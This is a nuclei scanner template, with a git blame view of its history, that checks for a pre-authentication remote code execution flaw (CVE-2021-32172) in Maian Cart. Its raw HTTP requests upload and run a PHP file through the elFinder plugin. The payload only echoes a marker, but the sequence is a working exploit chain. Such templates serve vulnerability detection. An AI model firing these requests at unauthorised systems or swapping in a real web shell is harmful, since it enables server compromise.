nuclei-templates/cves/2021/CVE-2021-32172.yaml

id: CVE-2021-32172

info:
  name: Maian Cart 3.8 preauth RCE
  author: pdteam
  severity: critical
  description: A severe vulnerability has been kindly reported to me by security advisor DreyAnd. The issue concerns the elFinder file manager plugin in Maian Cart and it affects all versions from 3.0 to 3.8.
  reference:
    - https://dreyand.github.io/maian-cart-rce/
    - https://github.com/DreyAnd/maian-cart-rce
    - https://www.maianscriptworld.co.uk/critical-updates
    - https://nvd.nist.gov/vuln/detail/CVE-2021-32172
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-32172
    cwe-id: CWE-862
  tags: cve,cve2021,rce,unauth,maian

requests:
  - raw:
      - |
        GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

      - |
        POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, /; q=0.01
        Accept-Language: en-US,en;q=0.5
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e

      - |
        GET /product-downloads/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    extractors:
      - type: regex
        name: hash
        internal: true
        group: 1
        regex:
          - '"hash"\:"(.*?)"\,'

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_3, "{{randstr_1}}")'
          - "status_code_3 == 200"
        condition: and
Rename maian cart rce (#3532) * Update and rename vulnerabilities/other/maian-cart-preauth-rce.yaml to cves/2021/CVE-2021-32172.yaml * Update CVE-2021-32172.yaml Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> 2022-01-13 05:18:51 +00:00			`id: CVE-2021-32172`
Added Maian Cart 3.8 preauth RCE template 2021-05-24 23:38:52 +00:00
			`info:`
			`name: Maian Cart 3.8 preauth RCE`
			`author: pdteam`
			`severity: critical`
			`description: A severe vulnerability has been kindly reported to me by security advisor DreyAnd. The issue concerns the elFinder file manager plugin in Maian Cart and it affects all versions from 3.0 to 3.8.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://dreyand.github.io/maian-cart-rce/`
			`- https://github.com/DreyAnd/maian-cart-rce`
			`- https://www.maianscriptworld.co.uk/critical-updates`
Rename maian cart rce (#3532) * Update and rename vulnerabilities/other/maian-cart-preauth-rce.yaml to cves/2021/CVE-2021-32172.yaml * Update CVE-2021-32172.yaml Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> 2022-01-13 05:18:51 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-32172`
Auto Generated CVE annotations [Thu Jan 13 05:21:21 UTC 2022] :robot: 2022-01-13 05:21:21 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 9.8`
Auto Generated CVE annotations [Thu Jan 13 05:21:21 UTC 2022] :robot: 2022-01-13 05:21:21 +00:00			`cve-id: CVE-2021-32172`
			`cwe-id: CWE-862`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`tags: cve,cve2021,rce,unauth,maian`
Added Maian Cart 3.8 preauth RCE template 2021-05-24 23:38:52 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`

			`- \|`
			`POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: application/json, text/javascript, /; q=0.01`
			`Accept-Language: en-US,en;q=0.5`
			`Content-Type: application/x-www-form-urlencoded; charset=UTF-8`

			`cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e`

			`- \|`
			`GET /product-downloads/{{randstr}}.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`

			`extractors:`
			`- type: regex`
			`name: hash`
			`internal: true`
			`group: 1`
			`regex:`
			`- '"hash"\:"(.*?)"\,'`

			`req-condition: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
Reduce chances of FP 2021-06-13 06:53:47 +00:00			`- 'contains(body_3, "{{randstr_1}}")'`
Added missing condition 2021-06-26 14:05:52 +00:00			`- "status_code_3 == 200"`
Rename maian cart rce (#3532) * Update and rename vulnerabilities/other/maian-cart-preauth-rce.yaml to cves/2021/CVE-2021-32172.yaml * Update CVE-2021-32172.yaml Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> 2022-01-13 05:18:51 +00:00			`condition: and`